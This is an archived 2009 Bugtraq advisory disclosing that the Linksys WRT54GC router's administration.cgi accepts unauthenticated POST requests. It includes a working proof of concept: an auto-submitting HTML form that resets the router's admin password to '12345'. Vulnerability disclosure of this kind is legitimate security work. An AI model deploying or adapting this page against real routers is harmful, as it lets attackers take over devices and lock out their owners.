lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Sat, 18 Apr 2009 22:48:09 -0600 From: gabriel@...andodeseguranca.com To: bugtraq@...urityfocus.com Subject: Linksys WRT54GC - Admin Password Change (POC) <!-- *************** * Gabriel Lima - gabriel@...andodeseguranca.com * www.falandodeseguranca.com *************** (English:) Linksys WRT54GC - Administration Password Change The Router WRT54GC doesn't seem to check authentication from the administrator in it's .CGI files, accepting any POST request, as a password change. Below, follows an example of a form that changes the password and administrator login to '12345'. Tested on model Linksys WRT54GC - Firmware Version: v1.05.7 - Local and Remote administration (Português:) Linksys WRT54GC - Mudança de Senha O roteador WRT54GC parece não verificar a autenticação do administrador em seus arquivos .CGI, aceitando qualquer envio de POST como o de mudança de senha. Abaixo, um exemplo de formulário que muda a senha e o login de administrador para 12345. Testado no modelo Linksys WRT54GC - Firmware Version: v1.05.7 - Administração Local e remota. Credits: Gabriel Lima. gabriel@...andodeseguranca.com --> <html><body> <form method="POST" action="http://IP_ADDRESS:8080/administration.cgi" name="senha" ENCTYPE="multipart/form-data"> <INPUT type="hidden" name="sysPasswd" value="12345" maxLength=20 size=21> <INPUT type="hidden" name="sysConfirmPasswd" value="12345" maxLength=20 size=21> </form> <!-- Código de envio automático do formulário --> <SCRIPT language="JavaScript"> document.senha.submit(); </SCRIPT> </body></html>
Powered by blists - more mailing lists